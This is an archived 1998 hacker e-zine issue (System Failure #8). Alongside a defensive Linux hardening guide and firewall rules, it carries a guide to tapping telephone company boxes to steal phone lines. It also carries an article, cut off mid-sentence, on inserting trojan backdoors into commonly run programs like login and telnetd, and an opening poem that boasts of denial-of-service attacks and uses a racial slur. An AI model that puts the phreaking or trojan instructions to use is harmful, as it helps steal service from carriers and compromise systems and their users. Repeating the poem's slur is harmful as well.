home *** CD-ROM | disk | FTP | other *** search
/ Power Hacker 2003 / Power_Hacker_2003.iso / E-zine / Magazines / system-failure / sysf08.txt < prev    next >
Encoding:
Text File  |  2002-05-27  |  53.3 KB  |  1,085 lines

  1.        -> he comes through again?
  2.                                                        ,x½`'½x,
  3.                        ,sS    Ss,        ,sS'` 'Ss,    `"²%%²"'
  4.               ,sS'` 'Ss$$$:   $$$sS'` 'Ss$$$:   $$$sS'` 'SssS
  5.               $$$:" """"""" " $$$$$:" """"""" " """""" " $$$$:
  6.               `""""^%ggggg. ` ```""""^%ggggg%^"" ",g#"' `7$$$:
  7.              .ggg.   $$$'"""^%ggggg.  `'¼¼¼¼¼'    $$$:   $$$$:  .ggg.
  8.               $$$:   $$$:     $$$$$:    `¼¼¼¼     $$$:   $$$$:   $$$
  9.            << $$$>>  $$$<<    $$$$$>>    ¼¼¼'     $$$>>  $$$$<<  $$$ >>
  10.               $$$:   $$$:     $$$$$:    ,¼¼:      $$$:   $$$$:   $$$
  11.           ::: $$$:: :$$$:: :::$$$$$: : ,¼¼¼¼,  :::$$$::: $$$$: ::$$$ :::
  12.               $$$:   $$$:     $$$$$:  ,¼¼¼¼¼¼     $$$:   $$$$:   $$$
  13.               $$$:   $$$:``""""²²²"''`¼¼¼¼¼¼'     $$$:` `""""''  $$$
  14.               `"²²%%²²"'        `"²²%%²²"'        `"²²%%²²""²²%%²²"'
  15.       ..>> system failure.                 anarchist / satire
  16.  
  17. ┌────────────────────────────────────────────────────────────────────────────┐
  18. │                          System Failure: Issue #8                          │
  19. └────────────────────────────────────────────────────────────────────────────┘
  20. Yoyoyoyo and stuff. Happy New Year. Here's issue 8, we barely made it on time,
  21. but we've got some cool stuff in here. Sysfail.org was down for awhile due to
  22. hardware problems at amer.net, but we're back with a completely new look. Be
  23. sure to let us know what you think of our changes to the site, and keep those
  24. submissions coming. Saint skullY the Dazed has been added to the group as
  25. well, and also hosts our shell server (shell.sysfail.org). Enjoy the issue,
  26. and I'll see you again in System Failure #9.
  27.                                                         --Logic Box [1/30/98]
  28. ┌────────────────────────────────────────────────────────────────────────────┐
  29. │                           http://www.sysfail.org/                          │
  30. │                        [sysfail@linux.slackware.org]                       │
  31. └────────────────────────────────────────────────────────────────────────────┘
  32.                            eyem elite! (c) dh 1997
  33.  
  34.                eye am a haxor so elite
  35.                i have mad juarez at my feet
  36.                i own your b0x left and right
  37.                yoh fbi, ill put up a fight!
  38.  
  39.                as i ssping you with my packet juar4z
  40.                you try to find an ircOP that cares
  41.                as you reboot ur box, you think
  42.                why did i have to mess with this chink
  43.  
  44.                you try and report denial of service, but logs dont count
  45.                five more packets and ur connection is out.
  46.                you get pissed and start to shout
  47.                THIS MOTHER FUCKER IS ONE BAD SCOUT!
  48.  
  49.                try and turn me into the fbi
  50.                cause i keep making joo cry
  51.                with my bringing your network down like a rock
  52.                because you had to go off and be a c0ck!
  53.  
  54.                i hear the fbi at my door
  55.                i rm my juarez, so they dont score.
  56.                they look confused with their frizzy hair,
  57.                they say this is just some kid, with no care.
  58.                Mother fucker, you think you've won.
  59.                but i have just begun.....
  60.  
  61.                      --- dh,.
  62. ┌────────────────────────────────────────────────────────────────────────────┐
  63. │                                  CONTENTS                                  │
  64. │ SysInfoTrade                                                   by Pinguino │
  65. │ Basic Linux Security                                          by Logic Box │
  66. │ Understanding Bell Boxes                                      by DataStorm │
  67. │ Firewalling Your Linux Boxen, Part 3                          by Dr. Seuss │
  68. │ A Guide to Trojans                                          by Kortex Bawm │
  69. │ Evading Anti-Shoplifting Devices                                 by Spessa │
  70. │ Fear of the Unknown                                           by NeWarrior │
  71. │ Fraud Force System Technical Interoffice Data                      by DDay │
  72. └────────────────────────────────────────────────────────────────────────────┘
  73.  
  74. <-------+
  75.         |  SysInfoTrade
  76.         +----------------> pinguino@leper.org
  77.  
  78. --Our domains are back up. www.sysfail.org has been fully redesigned, and
  79. we're adding a telnet board and javaIRC. penguinpalace.com is back up and
  80. being redesigned to appear as an umbrella organization for publications.
  81. --DefCon is slated to take place mid August, but at an unknown location.
  82. --ADSL is the new speed everyone's talking about; a quabizillion companies
  83. getting together to make the web a faster place to play with. Here's the url
  84. to see if your area is going to test it:
  85. http://www.adsl.com/trial_matrix.html and for more info go to adsl.com
  86. --Switchboard.com is now offering free email services. You can have a web
  87. account there, or have it forward. They will also give you some cheesy
  88. free webspace.
  89. --Jan 19, 1997. AOL gets into another fight.. against the US Navy!
  90. Apparently the sailor put "gay" on his profile, so he got dismissed from the
  91. military. The sailor's name is Tim McVeigh, and he's suing the Navy with
  92. AOL's support. The Navy says that having "gay" on an electronic profile goes
  93. against their "don't ask, don't tell" policy.
  94. --The birth of "digital phreak p1mps", a brand spankin' new lam-0 phreak
  95. zine.  It can be found at "http://members.tripod.com/~p1mp". The innaugeral
  96. issue is to be released on January 30, so get off your ass and read it!
  97. (info from hatredonalog)
  98. --Can't get enough prank call tapes? Blackout's Box was a voicemail system
  99. which moved to realaudio.. www.blackout.com
  100. --Are you a "suspicious PERSON????" The Computer Assisted Passenger Screening
  101. System (CAPS) might think so! When TWA's plane went down, the government set
  102. up this system to tag people who fit the profile of a terrorist based on
  103. 40 pieces of data. This does not include race or religion. For personal story
  104. of someone who was randomly chosedn a few times, check this out:
  105. http://www.slate.com/FineWhine/97-05-24/FineWhine.asp
  106. --US West is considering a split into two companies, US West Communications
  107. and US West Media group. Communications is the phone company, and Media is
  108. cable and DEX.
  109. --US West is teaming up with Cisco, Williams, and Intermedia to complete its
  110. "Next Generation National Data Network."  Their goal is to offer full network
  111. services outside their 14-state limit, being the first BOC to do so. They want
  112. to offer applications utelizing IP telephony, fax systems, and multimedia.
  113. By partnering with Intermedia, US West gains 142 additional data switches
  114. and over 385 network-to-network interfaces(NNI).
  115. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  116.                              Basic Linux Security
  117.                    by Logic Box (logic@linux.slackware.org)
  118. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  119. Security is a major headache for many a Linux user. Whether you've just
  120. installed your shiny new distribution of Slackware or (god forbid) Redhat,
  121. or you've been running Linux for awhile, chances are security is an issue to
  122. you if have any desire at all to keep your Linux box in one piece.
  123.  
  124. I'm not some mighty security wizard, nor do I claim to be. I've only been
  125. using Linux for about nine months at the time of this writing, and I still
  126. have a lot to learn. Several of my suggestions in this article will
  127. reiterate--and build on--the points made in Saint skullY's article from System
  128. Failure #5. skullY (along with kadafi, drs, and vel0city, thanks guys) has
  129. been one of the most helpful people to me in the short amount of time I've 
  130. been using Linux, so it would be difficult to write any sort of security
  131. article without mentioning some of the things that I've learned from him. I
  132. just thought it'd be a good idea to compile all my limited security
  133. knowledge into one place. So, here goes.
  134.  
  135. The following information is applicable to pretty much any Linux system,
  136. though I'd recommend it for Slackware users in particular, since that's the
  137. distribution that I gathered all of this information with (Slackware 3.4
  138. running the 2.0.33 kernel, specifically). If you aren't running Slackware,
  139. you can get it at ftp://ftp.cdrom.com/pub/linux/slackware/
  140.  
  141.  
  142. The Inet Daemon
  143. ---------------
  144. The Inet daemon (inetd) is started at boot time and controls what services
  145. are available on your system. You'll want to edit the inetd configuration
  146. file (stored in /etc/inetd.conf) and weed out a few of the more needless
  147. services.
  148.  
  149. A large majority of the services listed in inetd.conf are of no use to an
  150. everyday Linux user, and several of them pose dangerous security hazards.
  151. Unnecessary services should be commented out, after which inetd should be
  152. restarted (killall -HUP inetd).
  153.  
  154. The only service that is absolutely needed is auth, which allows servers to
  155. verify your identity via identd requests. Auth operates on port 113. If you
  156. plan on giving out shell accounts, you might also want to enable telnet and
  157. ftp. Pop3 and smtp services are unnecessary unless you plan on running a mail 
  158. server, and the other services are needless as well. If for some reason you 
  159. want to change the ports on which enabled services may be accessed, you can 
  160. edit them in /etc/services.
  161.  
  162.  
  163. The Syslog Daemon
  164. -----------------
  165. The Syslog daemon (syslogd) is also started at boot time. It controls where
  166. system log files are saved, and what sorts of activities are to be logged.
  167. Its configuration file is stored in /etc/syslog.conf, and some quick
  168. editing of it will make monitoring your system logs much more efficient.
  169.  
  170. First of all, you'll want to save your system logs to files. To do this, add
  171. the following lines to your syslog.conf file (make sure to use tabs, not
  172. spaces):
  173.  
  174. *.*                                             /var/log/all
  175. local5.*                                        /var/log/tcplog
  176. local4.*                                        /var/log/icmplog
  177. kern.*                                          /var/log/kern
  178. daemon.*                                        /var/log/daemon
  179. auth.*                                          /var/log/auth
  180. *.=debug                                        /var/log/debug
  181. *.=info;*.=notice                               /var/log/messages
  182. *.warning;*.err;*.crit;*.alert;*.emerg          /var/log/syslog
  183.  
  184. This will log most important information to text files, which you will be
  185. able to review at your discretion. In addition, it is also very handy to
  186. have a running activity log that you can view quickly and frequently. To
  187. allow this, add these line to syslog.conf:
  188.  
  189. *.*                                             /dev/tty7
  190. local5.*                                        /dev/tty8
  191. local4.*                                        /dev/tty9
  192. kern.*                                          /dev/tty10
  193. daemon.*                                        /dev/tty11
  194. auth.*                                          /dev/tty12
  195.  
  196. This will display all system activity on tty7 (Alt-F7), and it will also be
  197. saved to /var/log/all, as shown above. TCP logs will be displayed on tty8,
  198. with ICMP logs on tty9. Kernel messages will output to tty10, daemon
  199. messages to tty11, and auth messages on tty12. This is very useful for 
  200. diagnosing problems quickly. If you're using tty7-12 for something else, 
  201. redirect the output to tty13-18 (or whatever) instead, which may be accessed
  202. through the use of the right Alt key. After you've made changes to your 
  203. /etc/syslog.conf file, restart syslogd (killall -HUP syslogd).
  204.  
  205. I would also suggest running tcplog and icmplog at all times. They will
  206. monitor TCP and ICMP connections to your machine, which will be displayed in
  207. the syslog.
  208.  
  209.  
  210. File and Directory Permissions
  211. ------------------------------
  212. Now comes the fun part. SUID bits. SUID stands for Set User ID. Each user on
  213. a Linux machine has their own unique user ID (UID), which can be changed
  214. through the use of /bin/su. This can be an extremely dangerous program if
  215. you don't know what you're doing.
  216.  
  217. There are many files on a Linux machine which require root privileges to
  218. run. su is one of these programs, as are passwd, ping, strace, and several
  219. others. When executed, such programs temporarily switch the user's ID to 0
  220. (root), and then switch the UID back to its normal number when it is
  221. finished. You can check to see if a file has a SUID bit on it by doing an ls
  222. -la in a directory, and examining the file permissions. An "s" anywhere in
  223. the file permissions means that the program sets UID 0 when executed. For
  224. example:
  225.  
  226. -rws--x--x   1 root     root        32196 Jan  3 21:38 /usr/bin/passwd*
  227.  
  228. The passwd file has a SUID bit, and changes the UID to 0 when it is executed
  229. to change a user's password. This is necessary because only root has the
  230. authority to change passwords, so the user is given temporary superuser
  231. status while changing his password.
  232.  
  233. This is all good and well, but there are a great many exploits that can
  234. create buffer overflows in SUID root programs, causing a premature exit and
  235. spawning a root shell. Good examples of this are lpr, mount, and umount.
  236.  
  237. In order to protect against SUID exploits, it is advisable to remove the
  238. SUID bits from most of the files on your Linux machine (chmod a-s filename).
  239. The only programs which absolutely MUST have a SUID bit in order to operate
  240. correctly are /usr/bin/passwd and /bin/su, as well as /usr/bin/sudo if you
  241. use it (I don't). A quick way to scan your system for SUID root files is:
  242.  
  243. find / \( -perm -4000 -o -perm -2000 \) -exec ls -ldb {} \;
  244.  
  245. Unless you place implicit trust in everyone you give accounts to, it is also
  246. unwise to allow free access of /bin/su to everyone. I would strongly suggest
  247. creating a su group. Change group ownership of /bin/su to su (chgrp su
  248. /bin/su), change its file permissions to allow only those in the su group to
  249. access it (chmod o-x /bin/su), and add the following line to /etc/group:
  250.  
  251. su::1002:root,user1,user2,user3
  252.  
  253. Replace user1, user2, and user3 with appropriate login names of those who
  254. should have access to /bin/su; add as many login names as you need to,
  255. separated by commas. The su group's group ID (GID) is 1002, though you can
  256. change this if you like.
  257.  
  258. As stated previously, passwd and su are the only programs on your system
  259. that need to be SUID root to work. Their file permissions should look
  260. similar to this when you are finished, with no other SUID root files on your
  261. system:
  262.  
  263. -rws--x--x   1 root     root        32196 Jan  3 21:38 /usr/bin/passwd*
  264. -rws--x---   1 root     su          29784 Dec  9 21:35 /bin/su*
  265.  
  266. Another thing you might want to do is disallow others to access /root (chmod
  267. 700 /root), since sensitive files are often kept there.
  268.  
  269.  
  270. Preventing Unwanted Logins
  271. --------------------------
  272. One thing you definitely do NOT want people to have the option to do is to
  273. log in remotely as root. The /etc/securetty file controls which ttys are
  274. allowed to log in as root. ONLY the console and local ttys (tty1, tty2,
  275. etc.) should be allowed to log in as root. Remote ttys (ttyS0, ttyS1, ttyp0,
  276. ttyp1, etc.) should not be allowed to log in as root. Comment these ttys
  277. out. After being edited, your /etc/securetty file should look something like
  278. this:
  279.  
  280. console
  281. tty1
  282. tty2
  283. tty3
  284. tty4
  285. tty5
  286. tty6
  287. #ttyS0
  288. #ttyS1
  289. #ttyS2
  290. #ttyS3
  291. #ttyp0
  292. #ttyp1
  293. #ttyp2
  294. #ttyp3
  295.  
  296. Another thing you might want to do (depending on how paranoid you are) is to
  297. control what hosts are even allowed a login prompt on your machine. The
  298. /etc/hosts.allow and /etc/hosts.deny files control this. You should add the
  299. following line to /etc/hosts.allow, regardless of whether or not you want to
  300. restrict access:
  301.  
  302. ALL:127.0.0.1
  303.  
  304. 127.0.0.1 is the localhost (your computer). You can test out various
  305. services such as telnet or ftp by connecting to yourself and logging in,
  306. which would be impossible without this line in /etc/hosts.allow.
  307.  
  308. Now, if you're the paranoid type like me and you want to restrict who can
  309. access your machine, first add this line to /etc/hosts.deny:
  310.  
  311. ALL:ALL
  312.  
  313. Trusted hostnames may then be added to /etc/hosts.allow. For instance, if
  314. you've created an account for someone from cool.isp.net, you would add this
  315. line to /etc/hosts.allow in order to allow that person to log in:
  316.  
  317. ALL:cool.isp.net
  318.  
  319. Dynamic hostnames are a bit trickier, though they don't present too much of
  320. a problem. Let's say, for example, you wanted to allow someone from PSI.Net
  321. to log in to your machine. That's all good and well, except for the fact
  322. that their hostname is ip170.mountain-view.ca.pub-ip.psi.net and changes
  323. evertime they connect to their provider. So, we'll allow for all PSI.Net
  324. users within California to reach a login prompt by adding the following line
  325. to /etc/hosts.allow:
  326.  
  327. ALL:.ca.pub-ip.psi.net
  328.  
  329. Restricting login access isn't terribly necessary, unless you are
  330. administrating a machine for a corporation or you're just paranoid. :)
  331.  
  332.  
  333. Boot Files
  334. ----------
  335. Several files are executed at boot time, which are stored in /etc/rc.d.
  336. These files run daemons, execute startup and shutdown scripts, and perform
  337. custom-tailored actions specified by the administrator.
  338.  
  339. A couple of these files (/etc/rc.d/rc.M and /etc/rc.d/rc.inet2) call some 
  340. daemons that are probably not necessary for you to run. If you do not plan to 
  341. run a mail server, edit /etc/rc.d/rc.M and comment out the lines that refer 
  342. to the sendmail daemon.
  343.  
  344. # Start the sendmail daemon:
  345. # if [ -x /usr/sbin/sendmail ]; then
  346. #   echo "Starting sendmail daemon (/usr/sbin/sendmail -bd -q15m)..."
  347. #   /usr/sbin/sendmail -bd -q15m
  348. # fi
  349.  
  350. Similarly, if you aren't going to run a webserver, comment out the lines in
  351. /etc/rc.d/rc.M that refer to httpd.
  352.  
  353. # Start Web server:
  354. # if [ -x /etc/rc.d/rc.httpd ]; then
  355. #   . /etc/rc.d/rc.httpd
  356. # fi
  357.  
  358. Some of these lines may be nonexistent or already commented out in your
  359. /etc/rc.d/rc.M file if you have not installed the corresponding software
  360. packages.
  361.  
  362. Next, edit /etc/rc.d/rc.inet2 and comment out the two sections referring to
  363. SUN RPC. You might also want to disable the printer spooler daemon. When you
  364. are finished editing rc.inet2, these three sections should look like this:
  365.  
  366. # Constants.
  367. NET="/usr/sbin"
  368. IN_SERV=""
  369. LPSPOOL="/var/spool/lpd"
  370.  
  371. # Start the SUN RPC Portmapper.
  372. #if [ -f ${NET}/rpc.portmap ]; then
  373. #   echo -n " portmap"
  374. #   ${NET}/rpc.portmap
  375. #fi
  376.  
  377. # # Start the various SUN RPC servers.
  378. #if [ -f ${NET}/rpc.portmap ]; then
  379. #  # Start the NFS server daemons.
  380. #  if [ -f ${NET}/rpc.mountd ]; then
  381. #    echo -n " mountd"
  382. #    ${NET}/rpc.mountd
  383. #  fi
  384. #  if [ -f ${NET}/rpc.nfsd ]; then
  385. #    echo -n " nfsd"
  386. #    ${NET}/rpc.nfsd
  387. #  fi
  388. ##  # Fire up the PC-NFS daemon(s).
  389. ##  if [ -f ${NET}/rpc.pcnfsd ]; then
  390. ##    echo -n " pcnfsd"
  391. ##    ${NET}/rpc.pcnfsd ${LPSPOOL}
  392. ##  fi
  393. ##  if [ -f ${NET}/rpc.bwnfsd ]; then
  394. ##    echo -n " bwnfsd"
  395. ##    ${NET}/rpc.bwnfsd ${LPSPOOL}
  396. ##  fi
  397. #fi # Done starting various SUN RPC servers.
  398.  
  399. Disabling the abovementioned services will close off a number of unneeded 
  400. ports, limiting the number of ports that people can connect to and thereby 
  401. reducing the number of security hazards.
  402.  
  403.  
  404. Mounting Other Filesystems
  405. --------------------------
  406. It is not advisable to mount your DOS or (ugh) OS2 filesystems in publicly
  407. accessible directories. Create directories in /root for these filesystems,
  408. and mount them accordignly in /etc/fstab. For example, you might create a
  409. /root/dos directory where /dev/hda1 (your DOS partition) is to be mounted,
  410. and add the following line to /etc/fstab to mount it correctly:
  411.  
  412. /dev/hda1       /root/dos  msdos   defaults        1       1
  413.  
  414.  
  415. Firewalling
  416. -----------
  417. While not absolutely necessary, firewalling can help a great deal to keep
  418. unwanted things such as denial of service attacks at bay. I don't know much
  419. about firewalling, but a lot of what I do know was learned from Dr. Seuss's
  420. article "Firewalling Your Linux Boxen, Part 1: A Stand-Alone Firewall" from
  421. System Failure #6 (http://www.sysfail.org/). Please refer to that article
  422. for instructions on how to set up a basic firewall.
  423.  
  424.  
  425. Passwords
  426. ---------
  427. Passwords are annoying things. Fortunately, recent Linux releases (Slackware
  428. at least) make some attempt to guard against password cracking. Users will
  429. be warned when attempting to create weak passwords, and on some machines,
  430. they won't even be allowed to use a password that the system deems weak. It
  431. is advisable to use strong passwords, with a combination of numbers and
  432. letters (upper and lower case), and a length of no less than six characters.
  433.  
  434. Shadowed passwords are also recommended. Recent Linux releases also come
  435. with this enabled by default. Shadowed passwords are much more difficult to
  436. crack, and could possibly save you quite a few headaches. If you don't have
  437. the Shadow Password Suite, get it at
  438. ftp://sunsite.unc.edu/pub/Linux/system/admin/ (shadow-971001.tar.gz was the
  439. latest at the time of this writing) and install it.
  440.  
  441.  
  442. Staying Updated
  443. ---------------
  444. After following all of the above suggestions, the best way of keeping a
  445. reasonably secure system would be to stay updated. Always run the latest
  446. Linux kernel (2.0.33 was the latest at the time of this writing), keep your
  447. libc files recent, keep your programs up-to-date, and make yourself aware of
  448. new security exploits as they are found. The following links will help you
  449. to accomplish this.
  450.  
  451. ftp://sunsite.unc.edu/pub/Linux/
  452. ftp://tsx-11.mit.edu/pub/linux/
  453. ftp://ftp.cdrom.com/pub/linux/
  454. ftp://ftp.kernel.org/
  455. http://www.linux.org/
  456. http://www.ecst.csuchico.edu/~jtmurphy/
  457. http://www.users.interport.net/~reptile/linux/
  458. http://www.geek-girl.com/bugtraq/
  459.  
  460. This article is only an introduction to Linux security. Following these
  461. suggestions will give you a reasonably secure system, and will keep your box
  462. out of the hands of idiot wannabes seeking to screw you over.
  463.  
  464. Much thanks goes to Kadafi, Dr. Seuss, Saint skullY the Dazed, and vel0city.
  465. I never would have been able to write this article without them, nor would I
  466. have ever gotten as far as I have with Linux. If you've got questions or
  467. comments about this article, feel free to e-mail me.
  468. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  469.                            Understanding Bell Boxes
  470.                          by DataStorm (havok@tfs.net)
  471. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  472. I have found the usual texts on Bell system boxes vague and somewhat old, and
  473. overall not very useful in the field. Because of this I have decided to write
  474. my own, a more up-to-date and precise version if I do say so. Keep in mind
  475. that this text is based around MY experiences with Southwestern Bell's
  476. equipment, your RBOC may have different equipment or may label theirs
  477. differently. Also, this text is NOT complete by any means, but should give you
  478. enough information to get what you want.
  479.  
  480. Bell boxes differ as much in color and shape as they do in location and
  481. operation. The easiest and perhaps the safest box to beige off of is the
  482. CUI (Customer User Interface). This box is located at the side (sometimes the
  483. basement) of 99% of buildings that have telephone service. This box is
  484. divided into two sections, the customer test side, and the Bell service side.
  485. The customer test side is opened with a philips screwdriver, and contains one
  486. or many RJ-11 female sockets. This side was designed for use by the customer,
  487. to test if a problem in their phone service is the customer's or Bell's
  488. problem. Fortunately, most everyone has no idea that this box exsists, let
  489. alone what it is used for. The Bell service side is pretty much useless to
  490. phreaks, so don't worry about it. You should be able to phreak from this box
  491. with no problem, so that is all I am going to say about it.
  492.  
  493. Leaving the safety of the customers' property and exploring the vastness of
  494. the field, the next box I am going to discuss is the SPL, or splice box. This
  495. box is about 2 1/2 feet high, and about 4 inches wide and deep (although I
  496. have seen them twice as big, and in odd shapes such as cylinders). You will
  497. know it is a splice box because it will have large letters on the front that
  498. say "SPL". Find a secluded box, wait until night, and open it up. Inside is an
  499. array of wires of all different colors. When I first started working with Bell
  500. boxes, I about died looking in one of these for the first time. I expected a
  501. neatly organized board with only the four standard pair colors, and screws
  502. where I could screw in my beige. It wasn't until a few months later that I
  503. actually found out how to use one of these. The wires ARE in pairs, but they
  504. are in different colors for each pair, because so many pairs come though these
  505. boxes (these boxes are used to seperate sections of cable, in case a cable
  506. breaks they don't have to replace three miles of cable). This is the actual
  507. telephone cable you are looking at, which I presume heads on to a cross box,
  508. but I will disscuss that later. Below is a list of all of the colors and
  509. their corresponding color to form a pair. To phreak on these boxes requires
  510. you to do some damage. Of course, you probably don't care unless you're the
  511. Bell tech doing the fixing.
  512.  
  513. Pair #      Tip        Ring
  514. --------------------------------------
  515. 1        White        Blue
  516. 2        White        Orange
  517. 3        White        Green
  518. 4        White        Brown
  519. 5        White         Silver
  520. 6        Red        Blue
  521. 7        Red        Orange
  522. 8        Red        Green
  523. 9        Red        Brown
  524. 10        Red        Silver
  525. 11        Black        Blue
  526. 12        Black        Orange
  527. 13        Black        Green
  528. 14        Black        Brown
  529. 15        Black        Silver
  530. 16        Yellow        Blue
  531. 17        Yellow        Orange
  532. 18        Yellow        Green
  533. 19        Yellow        Brown
  534. 20        Yellow        Silver
  535. 21        Purple        Blue
  536. 22        Purple        Orange
  537. 23        Purple        Green
  538. 24        Purple        Brown
  539. 25        Purple        Silver
  540.  
  541. On some telephone poles (usually right outside of a business), there are small
  542. silver boxes (about the same size as the CUI). These boxes are made out of
  543. aluminum and usually have one or two lines in them. Beiging from these boxes
  544. is extremely easy; you just have to clip on and dial away. Be aware, though,
  545. that these boxes are almost always located next to a street or busy area, and
  546. you may have trouble using one carefully.
  547.  
  548. Most similar to the splice box, the next box I am going to talk about has no
  549. proper name, at least to me. Call them whatever you like. I have heard Bell
  550. technicians call them "pedestals" but that term can be used to describe many
  551. different forms of Bell boxes. This box is the same size and shape as the
  552. splice box, but is much different inside. Inside there are rows of screws,
  553. just waiting for you to clip them with your beige box. A phreaker's dream if
  554. you ask me. I don't know very much about them so this is as far as I go on
  555. that topic.
  556.  
  557. The next type of box I am going to talk about is the infamous cross box. These
  558. things are big. If you see a large green box that has the letters XBOX on it,
  559. rest assured it is a cross box. These boxes are almost always out in the open,
  560. and I would be careful when phreaking from one of these. From what I have seen
  561. (and discussed with Bell technicians), the inside of these boxes resemble
  562. punchdown blocks, each wire in its own cozy punchdown. If you have access to
  563. the inside of these, you have access to A LOT [Editor's note: THERE KAD, ARE
  564. YOU HAPPY? ;)] of phone lines. The lines are sometimes labled on the inside of
  565. the swing-open doors, and Bell technicians sometimes leave tools and other
  566. goodies inside of these. These boxes shouldn't be too hard for you to phreak
  567. from--that is, if you can get access to one.
  568.  
  569. Moving right along. At the top of a telephone pole that services a house is an
  570. array of lines, sometimes even extra lines. All that would be needed to get
  571. your own second phone line at no charge is some wire, some coupling tools, and
  572. some balls. I wouldn't be supprised if Bell noticed after awhile though
  573. (actually I would be suprised if they DIDN'T notice).
  574.  
  575. Last but not least, I am going to tell you about the most powerful--and most
  576. dangerous--phreaking tool there is. This is your local switch. Imagine it,
  577. you walk in with your lineman's handset, and conveniently plug into ANY line
  578. in the whole town. Better yet, go to your local AT&T or Sprint tandem switch.
  579. You now have hundreds of lines available for you to access. Actually I
  580. wouldn't reccomend doing anything in this last paragraph, or you may go to
  581. jail forever.
  582. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  583. Firewalling Your Linux Boxen, Part 3: Firewalling in Relation to Masquerading
  584.                          by Dr. Seuss (drs@monks.net)
  585. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  586. <PREFACE>
  587. This article was intended to have information about firewalling in relation to
  588. IP masquerading, and some cool firewall scripts. Unfortunately I suffered a
  589. huge HD crash this week, losing the article and all the scripts, therefore all
  590. you get is the IP Masquerading part. Check out SysFail #9 for my scripts
  591. article.
  592. </PREFACE>
  593.  
  594. If you don't know what IP Masquerading, is this article isn't for you.
  595.  
  596. When using Linux to masquerade a LAN you must consider a few things when
  597. constructing a firewall. First you want to make sure that your firewall
  598. doesn't restrict your LAN machines from accessing the internet or services on
  599. your local machine.
  600.  
  601. For example, if you are running samba on your local machine to share data with
  602. the Windows machines on your LAN, then the following rule for Firewall part 1
  603. would also deny your local LAN.
  604.  
  605. ipfwadm -I -a deny -P tcp -S 0/0 -D 0/0 139 -o
  606.  
  607. In order to repair this, we have two choices. One is to add a -W ppp0 to make
  608. it only apply to the ppp0 interface (e.g. packets not coming from the LAN), or
  609. add this line above the existing line.
  610.  
  611. ipfwadm -I -a accept -P tcp -S 192.168.1.0/0 -D 0/0 139
  612.  
  613. Assuming your LAN is using 192.168.1.0/24 as its block of IPs that would
  614. allow your LAN to communicate to your box, but still deny the outside world.
  615.  
  616. Check the other rules you are currently implementing and make sure they do not
  617. interfere with the operation of your masqueraded machines.
  618.  
  619. The next thing you are going to want to do is make sure no one from the
  620. outside can spoof their IP to connect to your machine, so add this line in.
  621.  
  622. ipfwadm -I -a deny -S 192.168.1.0/24 -D 0/0 -W ppp0 
  623.  
  624. That will deny all traffic claiming to be from your local LAN.
  625.  
  626. The main thing to remember is to carefully check rules before placing them,
  627. and understand what they do before you place them.
  628.  
  629. <APPENDIX>
  630. Sorry about the shortness of this article, but as I stated above, the majority
  631. of it was going to be on firewall scripts. Oh well, stay tuned to SysFail, and
  632. look for the scripts in the next issue.
  633. </APPENDIX>
  634. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  635.                               A Guide to Trojans
  636.                      by Kortex Bawm (k0rtex@hotmail.com)
  637. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  638. In case you aren't too bright, this article is about making and implementing
  639. trojans on a UNIX type system. For this you should only need:
  640.  
  641. - A decent knowledge of a UNIX type system.
  642. - Access to code for a common command/program run.
  643. - A basic knowledge of the programming language C.
  644.  
  645. Definition
  646. ----------
  647. Something is wrong with people today. No one gets the trojan definition right.
  648. Everyone thinks its a type of virus. It can be, but normally, they aren't. By
  649. definition from some dictionary I found at my house:
  650.  
  651. trojan (tro'jen): designed for one purpose, this purpose being cloaked by an
  652. other which is not the actual purpose.
  653.  
  654. That's not the actual thing, I translated it into something real people could
  655. understand. You get the picture.
  656.  
  657.  
  658. Why Are Trojans Nice?
  659. ---------------------
  660. Just because they are. A trojan can backdoor a system, get you root after
  661. you've lost it, just plain get you root, and whatever else you can come up
  662. with. The best reason is actually because of the fact that you must use
  663. imagination to make one. They are just plain neato leeto reeto freeto caneeto.
  664. Anyway, they will help a lot, regardless how experienced you are in hacking.
  665.  
  666.  
  667. In The Beginning
  668. ----------------
  669. There are several things you must do before being able to start. If the trojan
  670. is really important, do some research. See what root runs all the time, or
  671. what other superusers do. Now, try to find the code for it. Shouldn't be too
  672. hard for most Linux commands, or things such as ircII or BitchX. Many people
  673. put their trojan into the code for other things, such as telnetd and login.
  674. This can be good, but it somewhat limits your ability of what you can do. It's
  675. your choice, though. If you can't find the code for what you want, try
  676. something else.
  677.  
  678. ftp://prep.ai.mit.edu/
  679. ^- A good place to get source for just about everything.
  680.  
  681.  
  682. Making The Trojan
  683. -----------------
  684. Once you have the code, open it up. Here's where the knowledge of C comes in.
  685. Most every thing you are going to run is going to have its own header files
  686. (#include files), and you need to know where they should be when you compile
  687. it.
  688.  
  689. Anyway, once you have the code open, you need to find a good place to insert
  690. the trojan into the code. If it is a command, or something of that sort, I
  691. would put it near the end of it, just before the exit/return function that
  692. would end it. If it is another type of program, such as ircII, or some other
  693. common program run by everyone, I would insert in near the beginning, when it
  694. would open. It's all up to you though.
  695.  
  696. Depending on what you want the trojan to do, you may want to check if they
  697. have uid 0 (root). That can be done with a simple line like:
  698.  
  699. if (getuid() == 0)
  700.  
  701. If you won't need root to execute the trojan (rare), you won't need that line.
  702. Most trojans need/will work better with root access. Once you've established
  703. if they have uid 0, you can move on to executing the trojan itself.
  704.  
  705. You know what you need the trojan to do. Normally it will only be a few short
  706. commands and its done. Anyway, this can be done in two basic ways (at least
